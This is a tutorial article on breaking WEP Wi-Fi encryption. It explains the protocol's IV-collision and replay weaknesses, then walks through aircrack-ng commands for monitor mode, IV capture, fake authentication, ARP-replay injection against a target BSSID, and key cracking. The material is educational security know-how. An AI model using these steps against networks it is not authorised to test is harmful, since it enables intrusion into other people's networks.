Video: Cracking WiFi WEP with aircrack-ng

Introduction to WEP Cracking

This article introduces Wired Equivalent Privacy (WEP) for 802.11 wireless LAN networks, gives a brief overview of the cryptanalysis techniques against it and then demonstrates the use of the aircrack-ng tool.

The examples in this article are all based around 64 bit WEP though identical issues exist with 128bit WEP.

Wired Equivalent Privacy

All stations utilising WEP share a common root key. In 64-bit WEP this root key is 40-bits long. When a packet requires encryption a 24-bit Initialisation Vector (IV) is chosen (from a pool of 16,777,216 possible values). The concatentation of the 24-bit chosen IV and the 40-bit root key forms the packet key.

WEP utilses the RC4 cipher algorithm, with the packet key. The clear-text packet is concatentated with a CRC32 integrity check and then XORd with the pseudo-random stream (PRGA) generated by RC4. The resultant ciphertext packet is prepended with the IV (in the clear) and transmitted.

Weakness 1 : Initialization Vector Collisions

Though the use of IVs might seem to ensure that most packets are encrypted with a different packet key, there are only 16,777,216 IVs available and collisions are statistically likely. Knowing the plaintext of an encrypted packet (a Windows DHCP request, a challenge-response or an ARP request) allows extraction of the PRGA for the IV that was used. This PRGA can then be used to decrypt all other packets that use the same IV. Though useful, an attacker would need to maintain a table of 16,777,216 PRGAs in order to defeat the encyprtion.

Weakness 2 : No Replay Protection

Through the capture of a plaintext-ciphertext pair, and the subsequent extraction of the PRGA, an attacker can craft new packets to inject into the network. A new plaintext is created, the checksum is calculated and the packet is XORd with a PRGA for a known IV which is then prepended. The crafted packet can then be sent out over the air interface and will be accepted by the other stations as genuine.

Note that any response from other stations to an injected packet will likely use an IV whose PRGA is not known to the attacker. Thus, though WEP replay can stimulate activity on the network, it can’t be used for any interactive purpose.

Obtaining Key Stream

Because ARP requests and replies occur frequently and the first 16-bytes of plaintext are easily guessable, PRGA key stream can be readily extracted from them. A large amount of key stream can be extracted by stimulating ARP relies through the injection of replayed ARP requests. From the PTW paper:

To speed up key stream recovery, it is possible to re-inject a captured ARP request into the network, which will trigger another reply. The destination answers the request with a new response packet that we can add to our list of key streams. If the initiator and the destination of the original request have been both wireless stations, every re-injected packet will generate three new packets, because the transmission will be relayed by the access point. Because ARP replies expire quickly, it usually takes only a few seconds or minutes until an attacker can capture an ARP request and start re-injecting it.

WEP Cryptanalysis Techniques

There have been a number of WEP cryptanalysis techniques published in the last decade. They utilse the IV collision and no replay protection weaknesses in WEP and are all available in the aircrack-ng suite.

• FMS (Fluhrer, Mantin, Shamir) method
• Korek method
• PTW (Pyshkin, Tews, Weinmann) method

[ad#Google Adsense Leaderboard]

Using the aircrack-ng suite

To crack a WEP key using the aircrack-ng suite the attacker must know the BSSID (MAC address) of the base station and the MAC address of the interface used for the attack. The attack will not work if the base station is locked down by MAC address (though this can be overcome by changing the MAC on the attacking interface to that of an existing client station).

The video below shows the use of the Kismet tool to target a victim network, highlighting its channel and BSSID. A madwifi interface is then created in ‘monitor’ mode to handle collection of traffic.

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

airodump-ng is used to capture raw 802.11 frames. Below it is locked to the target channel (6) and is instructed to capture WEP IVs.

airodump-ng --channel 6 --ivs -w victim ath1

Next, ifconfig is used to discover the MAC address of the new ath1 interface. It, along with the harvested BSSID of the target network, is supplied to aireplay-ng. First it is used to conduct a fake authentication on the network (-1 0) and then it is used to inject ARP requests (-3).

ifconfig ath1
aireplay-ng -1 0 -a 00:15:E9:CB:6E:76 -h 06:15:AF:B4:20:26 ath1
aireplay-ng -3 -b 00:15:E9:CB:6E:76 -h 06:15:AF:B4:20:26 ath1

In ARP injection mode, aireplay-ng will pause until it sees an ARP request on the network. It will then save it to disk (for possible later use) and will begin replaying it onto the air interface. When a suitable number of IVs have been seen, aircrack-ng can be used to crack out the WEP key.

aircrack-ng victim-01.ivs

aircrack-ng will try to crack the key using the number of IVs currently captured. If it fails it will reload IVs from the capture file and will try again. It can therefore be started in parallel with airodump-ng and aireplay-ng.

The video below is a demonstration of the aircrack-ng suite as provided with the BackTrack 3 Linux distrobution.

Demonstration

More Information

More information on the aircrack-ng suite can be found at www.aircrack-ng.org.

BackTrack can be downloaded from www.remote-exploit.org.